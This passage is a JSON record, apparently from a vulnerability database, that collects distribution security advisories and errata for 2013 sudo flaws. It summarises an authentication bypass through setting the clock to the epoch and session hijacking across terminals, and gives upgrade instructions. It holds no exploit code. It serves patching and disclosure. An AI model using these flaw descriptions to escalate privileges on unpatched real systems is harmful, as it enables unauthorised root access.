ap/sudo-1.8.6p7-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg sudo-1.8.6p7-i486-1_slack14.0.txz", "modified": "2013-03-06T20:52:08", "published": "2013-03-06T20:52:08", "id": "SSA-2013-065-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.517440", "type": "slackware", "title": "sudo", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:20:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2642-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMarch 09, 2013 http://www.debian.org/security/faq\n- 
-------------------------------------------------------------------------\n\nPackage : sudo\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1775 CVE-2013-1776\nDebian Bug : 701838 701839\n\nSeveral vulnerabilities have been discovered in sudo, a program designed\nto allow a sysadmin to give limited root privileges to users. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2013-1775\n\n Marco Schoepl discovered an authentication bypass when the clock is\n set to the UNIX epoch [00:00:00 UTC on 1 January 1970].\n\nCVE-2013-1776\n\n Ryan Castellucci and James Ogden discovered aspects of an issue that\n would allow session id hijacking from another authorized tty.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.7.4p4-2.squeeze.4.\n\nFor the testing (wheezy) and unstable (sid) distributions, these problems\nhave been fixed in version 1.8.5p2-1+nmu1.\n\nWe recommend that you upgrade your sudo packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-03-09T08:35:57", "published": "2013-03-09T08:35:57", "id": "DEBIAN:DSA-2642-1:282D9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00046.html", "title": "[SECURITY] [DSA 2642-1] sudo security update", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. 
Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2013-03-16T01:22:34", "published": "2013-03-16T01:22:34", "id": "FEDORA:510B521DE6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: sudo-1.8.6p7-1.fc18", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2337", "CVE-2013-1775", "CVE-2013-1776"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. 
", "modified": "2013-03-19T20:04:50", "published": "2013-03-19T20:04:50", "id": "FEDORA:25778215CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: sudo-1.8.6p7-1.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1701\n\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n* Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. 
(BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to \"unlimited\".\n(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n\"root\" was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup database records with values\nfrom the running system and what the values are exactly. 
(BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname value\nfrom the /etc/sssd/sssd.conf configuration file when matching netgroups.\n(BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add\nthese enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-November/007294.html\n\n**Affected packages:**\nsudo\nsudo-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1701.html", "edition": 3, "modified": "2013-11-26T13:33:00", "published": "2013-11-26T13:33:00", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-November/007294.html", "id": "CESA-2013:1701", "title": "sudo security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:28:59", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1353\n\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. 
(CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n-s'. 
(BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-October/007077.html\n\n**Affected packages:**\nsudo\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1353.html", "edition": 3, "modified": "2013-10-07T13:01:59", "published": "2013-10-07T13:01:59", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-October/007077.html", "id": "CESA-2013:1353", "title": "sudo security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:03", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. 
This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n-s'. 
(BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n", "modified": "2017-09-08T12:06:27", "published": "2013-09-30T20:52:28", "id": "RHSA-2013:1353", "href": "https://access.redhat.com/errata/RHSA-2013:1353", "type": "redhat", "title": "(RHSA-2013:1353) Low: sudo security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2776", "CVE-2013-2777"], "description": "The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n* Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. 
(BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to \"unlimited\".\n(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n\"root\" was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup database records with values\nfrom the running system and what the values are exactly. 
(BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname value\nfrom the /etc/sssd/sssd.conf configuration file when matching netgroups.\n(BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add\nthese enhancements.\n", "modified": "2018-06-06T20:24:30", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1701", "href": "https://access.redhat.com/errata/RHSA-2013:1701", "type": "redhat", "title": "(RHSA-2013:1701) Low: sudo security, bug fix and enhancement update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:10", "bulletinFamily": "unix", "cvelist": ["CVE-2010-5107", "CVE-2012-0786", "CVE-2012-0787", "CVE-2012-4453", "CVE-2012-6542", "CVE-2012-6545", "CVE-2013-0221", "CVE-2013-0222", "CVE-2013-0223", "CVE-2013-0242", "CVE-2013-0343", "CVE-2013-1775", "CVE-2013-1813", "CVE-2013-1914", "CVE-2013-1928", "CVE-2013-1929", "CVE-2013-2164", "CVE-2013-2234", "CVE-2013-2776", "CVE-2013-2777", "CVE-2013-2851", "CVE-2013-2888", "CVE-2013-2889", "CVE-2013-2892", "CVE-2013-3231", "CVE-2013-4238", "CVE-2013-4242", "CVE-2013-4332", "CVE-2013-4344", "CVE-2013-4345", "CVE-2013-4387", "CVE-2013-4419", "CVE-2013-4591", "CVE-2013-4592"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. 
It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nUpgrade Note: If you upgrade the Red Hat Enterprise Virtualization\nHypervisor through the 3.2 Manager administration portal, the Host may\nappear with the status of \"Install Failed\". If this happens, place the host\ninto maintenance mode, then activate it again to get the host back to an\n\"Up\" state.\n\nA buffer overflow flaw was found in the way QEMU processed the SCSI \"REPORT\nLUNS\" command when more than 256 LUNs were specified for a single SCSI\ntarget. A privileged guest user could use this flaw to corrupt QEMU process\nmemory on the host, which could potentially result in arbitrary code\nexecution on the host with the privileges of the QEMU process.\n(CVE-2013-4344)\n\nMultiple flaws were found in the way Linux kernel handled HID (Human\nInterface Device) reports. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2013-2888, CVE-2013-2889, CVE-2013-2892)\n\nA flaw was found in the way the Python SSL module handled X.509 certificate\nfields that contain a NULL byte. An attacker could potentially exploit this\nflaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that\nto exploit this issue, an attacker would need to obtain a carefully crafted\ncertificate signed by an authority that the client trusts. (CVE-2013-4238)\n\nThe default OpenSSH configuration made it easy for remote attackers to\nexhaust unauthorized connection slots and prevent other users from being\nable to log in to a system. 
This flaw has been addressed by enabling random\nearly connection drops by setting MaxStartups to 10:30:100 by default.\nFor more information, refer to the sshd_config(5) man page. (CVE-2010-5107)\n\nThe CVE-2013-4344 issue was discovered by Asias He of Red Hat.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2012-0786 and CVE-2012-0787 (augeas issues)\n\nCVE-2013-1813 (busybox issue)\n\nCVE-2013-0221, CVE-2013-0222, and CVE-2013-0223 (coreutils issues)\n\nCVE-2012-4453 (dracut issue)\n\nCVE-2013-4332, CVE-2013-0242, and CVE-2013-1914 (glibc issues)\n\nCVE-2013-4387, CVE-2013-0343, CVE-2013-4345, CVE-2013-4591, CVE-2013-4592,\nCVE-2012-6542, CVE-2013-3231, CVE-2013-1929, CVE-2012-6545, CVE-2013-1928,\nCVE-2013-2164, CVE-2013-2234, and CVE-2013-2851 (kernel issues)\n\nCVE-2013-4242 (libgcrypt issue)\n\nCVE-2013-4419 (libguestfs issue)\n\nCVE-2013-1775, CVE-2013-2776, and CVE-2013-2777 (sudo issues)\n\nThis update also fixes the following bug:\n\n* A previous version of the rhev-hypervisor6 package did not contain the\nlatest vhostmd package, which provides a \"metrics communication channel\"\nbetween a host and its hosted virtual machines, allowing limited\nintrospection of host resource usage from within virtual machines. 
This has\nbeen fixed, and rhev-hypervisor6 now includes the latest vhostmd package.\n(BZ#1026703)\n\nThis update also contains the fixes from the following errata:\n\n* ovirt-node: https://rhn.redhat.com/errata/RHBA-2013-1528.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.\n", "modified": "2018-06-07T08:59:39", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1527", "href": "https://access.redhat.com/errata/RHSA-2013:1527", "type": "redhat", "title": "(RHSA-2013:1527) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "**Issue Overview:**\n\nA flaw was found in the way sudo handled time stamp files. An attacker able to run code as a local user and with the ability to control the system clock could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password. ([CVE-2013-1775 __](<https://access.redhat.com/security/cve/CVE-2013-1775>))\n\nIt was found that sudo did not properly validate the controlling terminal device when the tty_tickets option was enabled in the /etc/sudoers file. An attacker able to run code as a local user could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password. 
([CVE-2013-2776 __](<https://access.redhat.com/security/cve/CVE-2013-2776>), [CVE-2013-2777 __](<https://access.redhat.com/security/cve/CVE-2013-2777>))\n\n \n**Affected Packages:** \n\n\nsudo\n\n \n**Issue Correction:** \nRun _yum update sudo_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n sudo-devel-1.8.6p3-12.17.amzn1.i686 \n sudo-debuginfo-1.8.6p3-12.17.amzn1.i686 \n sudo-1.8.6p3-12.17.amzn1.i686 \n \n src: \n sudo-1.8.6p3-12.17.amzn1.src \n \n x86_64: \n sudo-devel-1.8.6p3-12.17.amzn1.x86_64 \n sudo-1.8.6p3-12.17.amzn1.x86_64 \n sudo-debuginfo-1.8.6p3-12.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-12-11T20:34:00", "published": "2013-12-11T20:34:00", "id": "ALAS-2013-259", "href": "https://alas.aws.amazon.com/ALAS-2013-259.html", "title": "Low: sudo", "type": "amazon", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "[1.8.6p3-12]\r\n- added patches for CVE-2013-1775 CVE-2013-2777 CVE-2013-2776\r\n Resolves: rhbz#1015355\r\n \n[1.8.6p3-11]\r\n- sssd: fixed a bug in ipa_hostname processing\r\n Resolves: rhbz#853542\r\n \n[1.8.6p3-10]\r\n- sssd: fixed buffer size for the ipa_hostname value\r\n Resolves: rhbz#853542\r\n \n[1.8.6p3-9]\r\n- sssd: match against ipa_hostname from sssd.conf too when\r\n checking sudoHost\r\n Resolves: rhbz#853542\r\n \n[1.8.6p3-8]\r\n- updated man-page\r\n- fixed handling of RLIMIT_NPROC resource limit\r\n- fixed alias cycle detection code\r\n- added debug messages for tracing of netgroup matching\r\n- fixed aborting on realloc when displaying allowed commands\r\n- show the SUDO_USER in logs, if running commands as root\r\n- sssd: filter netgroups in the sudoUser attribute\r\n Resolves: rhbz#856901\r\n Resolves: rhbz#947276\r\n Resolves: rhbz#886648\r\n Resolves: rhbz#994563\r\n Resolves: rhbz#848111\r\n Resolves: rhbz#994626\r\n 
Resolves: rhbz#973228\r\n Resolves: rhbz#880150", "edition": 4, "modified": "2013-11-25T00:00:00", "published": "2013-11-25T00:00:00", "id": "ELSA-2013-1701", "href": "http://linux.oracle.com/errata/ELSA-2013-1701.html", "title": "sudo security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2777", "CVE-2013-2776"], "description": "[1.7.2p1-28]\r\n- backported fixes for CVE-2013-1775 CVE-2013-1776 CVE-2013-2776 CVE-2013-2777\r\n Resolves: rhbz#968221\r\n \n[1.7.2p1-27]\r\n- visudo: fixed incorrect warning and parse error regarding\r\n undefined aliases which were in fact defined\r\n Resolves: rhbz#849679\r\n Resolves: rhbz#905624\r\n \n[1.7.2p1-26]\r\n- updated sudoers man-page to clarify the behavior of the user\r\n negation operator and the behavior of wildcard matching in command\r\n specifications\r\n Resolves: rhbz#846118\r\n Resolves: rhbz#856902\r\n \n[1.7.2p1-25]\r\n- fixed regression in escaping of sudo -i arguments\r\n Resolves: rhbz#853203\r\n \n[1.7.2p1-24]\r\n- bump release number\r\n \n[1.7.2p1-23]\r\n- Fixed caching of user and group names\r\n- Backported RFC 4515 escaping of LDAP queries\r\n Resolves: rhbz#855836\r\n Resolves: rhbz#869287", "edition": 4, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "ELSA-2013-1353", "href": "http://linux.oracle.com/errata/ELSA-2013-1353.html", "title": "sudo security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2777", "CVE-2013-2776"], "description": "### Background\n\nsudo allows a system administrator to give users the ability to run commands as other users. 
Access to commands may also be granted on a range of hosts. \n\n### Description\n\nMultiple vulnerabilities have been found in sudo:\n\n * sudo does not correctly validate the controlling terminal on a system without /proc or when the tty_tickets option is enabled. \n * sudo does not properly handle the clock when it is set to the epoch.\n\n### Impact\n\nA local attacker with sudo privileges could connect to the stdin, stdout, and stderr of the terminal of a user who has authenticated with sudo, allowing the attacker to hijack the authorization of the other user. Additionally, a local or physically proximate attacker could set the system clock to the epoch, bypassing time restrictions on sudo authentication. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll sudo users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/sudo-1.8.6_p7\"", "edition": 1, "modified": "2014-01-21T00:00:00", "published": "2014-01-21T00:00:00", "id": "GLSA-201401-23", "href": "https://security.gentoo.org/glsa/201401-23", "type": "gentoo", "title": "sudo: Privilege escalation", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}